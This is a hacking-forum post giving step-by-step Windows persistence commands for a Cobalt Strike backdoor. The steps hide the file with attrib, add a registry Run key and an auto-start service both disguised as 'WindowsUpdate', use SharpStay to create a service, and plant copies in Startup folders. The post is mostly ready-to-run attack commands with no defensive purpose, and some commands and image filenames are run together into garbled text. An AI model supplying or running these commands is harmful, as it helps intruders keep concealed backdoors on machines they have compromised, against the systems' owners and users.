Jump to content

Title: cobaltstrike permissions maintained

Featured Replies

Posted

1. Note on registry startup: This method is used to maintain permissions in this way to maintain task.exe is a backdoor file generated by CS. Here, the backdoor file can be used to avoid killing hidden files. Shell attrib C:\Windows\task.exe +s +h 1049983-20240926132220725-370366897.png Registry startup backdoor file shell reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WindowsUpdate /t REG_SZ /d 'C:\Windows\task.exe' /f 1049983-20240926132221608-1975630899.png 1049983-20240926132222308-1456730551.png

2. The windows service automatically starts the hidden file shell attrib C:\Windows\task.exe +s +h service automatically starts the execution backdoor file shell sc create 'WindowsUpdate' binpath='cmd /c start C:\Windows\task.exe'shell sc config 'WindowsUpdate' start=autoshell net start 'WindowsUpdate' 1049983-20240926132223008-1312124980.png 1049983-20240926132223610-567257077.png or 1049983-20240926132224397-1493573486.png 1049983-20240926132225014-118523183.png 1049983-20240926132225617-1332830607.png3.SharpStay.exe automation task starts SharpStay.exe action=CreateService servicename=Debug command='C:\Windows\task.exe' 1049983-20240926132226340-1568963179.png 1049983-20240926132227032-850389686.png

4. Automatically start the service directory (win7 system is only valid) shell copy 'C:\Windows\task.exe' 'C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdate.exe' /y or copy 'C:\Windows\task.exe' '%programdata%\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdate.exe' /yshell attrib 'C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdate.exe' +s +h 1049983-20240926132227635-347412550.png

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

Important Information

HackTeam Cookie PolicyWe have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.